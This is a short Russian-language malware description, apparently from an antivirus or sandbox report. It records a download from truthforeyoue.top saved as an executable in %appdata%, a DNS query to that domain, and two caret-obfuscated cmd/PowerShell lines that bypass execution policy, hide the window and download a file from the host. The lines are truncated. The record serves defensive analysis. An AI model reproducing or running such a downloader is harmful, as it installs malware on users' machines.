Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^wE^RSH^eL^L^.E^xe^ -EXeCu^tIO^NPO^LICy^ Byp^a^Ss ^-NOPr^oFile -^wi^NDOWsT^Y^le ^HIDden^ (new-O^bJec^t sysTEM.N^eT^.w^eB^cL^I^EnT).^DOWnl^oADfIlE^(^'http://truthforeyoue.t...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "pO^wE^RSH^eL^L^.E^xe^ -EXeCu^tIO^NPO^LICy^ Byp^a^Ss ^-NOPr^oFile -^wi^NDOWsT^Y^le ^HIDden^ (new-O^bJec^t sysTEM.N^eT^.w^eB^cL^I^EnT).^DOWnl^oADfIlE^(^'http://truthforeyoue.t...' (со скрытым окном)